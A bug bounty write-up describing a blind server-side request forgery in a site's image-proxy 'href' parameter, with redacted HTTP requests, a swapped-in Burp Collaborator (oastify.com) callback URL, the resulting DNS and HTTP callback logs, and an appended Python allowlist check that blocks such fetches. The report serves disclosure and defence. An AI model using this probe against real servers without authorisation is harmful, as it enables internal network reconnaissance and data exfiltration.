Blind SSRF

Saeid Khater
2 min readAug 22, 2024

--

Overview of the Vulnerability:

Server-side request forgery (SSRF) is a vulnerability that exploits the trust relationship between a server and an application, or other backend systems. An attacker can take advantage of this trust to forge server-side traffic and make HTTP requests to internal domains. An SSRF vulnerability was found in this application that allows an attacker to make a request to an internally networked resource, which is considered high impact.

Steps to Reproduce

  1. I use the paid version of Burp Suite and I have the “Burp Bounty Pro” extension.
  2. During my first working day with the site, I browsed it to find out information about it and the functions within it.
  3. At the end of the day, I had many results from all the extensions I used, including “Burp Bounty Pro.” I started checking the results and then found an interesting one:
GET /_image?f=[type]&w=[*]&h=[*]&ar=[*]&p=center&href=http://[Redacted].com HTTP/2
Host: [Redacted].com
User-Agent: [*]
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://[Redacted].com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Te: trailers

  4. The image is fetched by the parameter “href”.

  5. Change the link to a Burp Collaborator payload:

GET /_image?f=[type]&w=[*]&h=[*]&ar=[*]&p=center&href=http://[*].oastify.com HTTP/2
Host: [Redacted].com
User-Agent: [*]
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://[Redacted].com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Te: trailers

  6. Go to Collaborator, where you can find:

DNS:
The lookup was received from IP address [IPv4]:39601 at [*] UTC.
The lookup was received from IP address [IPv4]:30742 at [*] UTC.
HTTP:
The request was received from IP address [IPv4]:44268 at [*] UTC.

Impact:

  1. Probing internal networks.
  2. Data exfiltration.
  3. Interacting with internal services without immediate detection.
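As an added example (not part of the original write-up), here is a server-side check, in Python, of the kind that would have closed this finding: the `href` value of an image-proxy endpoint such as `/_image` is only fetched when its scheme is http(s), its host is on an allowlist, and the address it resolves to is public rather than internal. The allowlist entries, the hostnames, the fake resolver and the `validate_href` function name are assumptions made for this example.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Hosts the image proxy may fetch from (constructed example values; a real
# deployment would load these from configuration).
ALLOWED_HOSTS = {"images.example.com", "cdn.example.com"}


def is_public_ip(ip_str):
    """True only for a globally routable address: blocks RFC 1918 ranges,
    loopback, link-local (including the 169.254.169.254 metadata address)."""
    ip = ipaddress.ip_address(ip_str)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_href(href, resolver=socket.gethostbyname):
    """Return (True, resolved_ip) if the proxy may fetch href, else (False, reason).

    The resolver is injectable so the check runs offline in tests. The caller
    should connect to the returned IP (sending the original Host header) rather
    than resolving the name again, which would reopen a DNS-rebinding window.
    """
    try:
        parsed = urlparse(href)
    except ValueError:
        return False, "unparseable URL"
    if parsed.scheme not in ("http", "https"):
        return False, "scheme not allowed"        # no file://, gopher://, ...
    host = parsed.hostname
    if not host:
        return False, "missing host"
    if parsed.username or parsed.password:
        return False, "credentials in URL"        # user@host confusion
    if host not in ALLOWED_HOSTS:
        return False, "host not in allowlist"     # stops *.oastify.com callbacks
    try:
        ip = resolver(host)                        # defence in depth: even an
    except OSError:                                # allowlisted name must point
        return False, "DNS resolution failed"      # outside the internal network
    if not is_public_ip(ip):
        return False, "resolves to internal address"
    return True, ip


if __name__ == "__main__":
    # Constructed inputs: a legitimate image URL and a Collaborator-style host.
    for url in ("http://images.example.com/logo.png", "http://abc123.oastify.com/"):
        print(url, "->", validate_href(url, resolver=lambda h: "8.8.8.8"))
```

With this check in front of the fetch, the Collaborator-style `href` from step 5 is rejected at the allowlist stage and never produces a DNS or HTTP callback.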
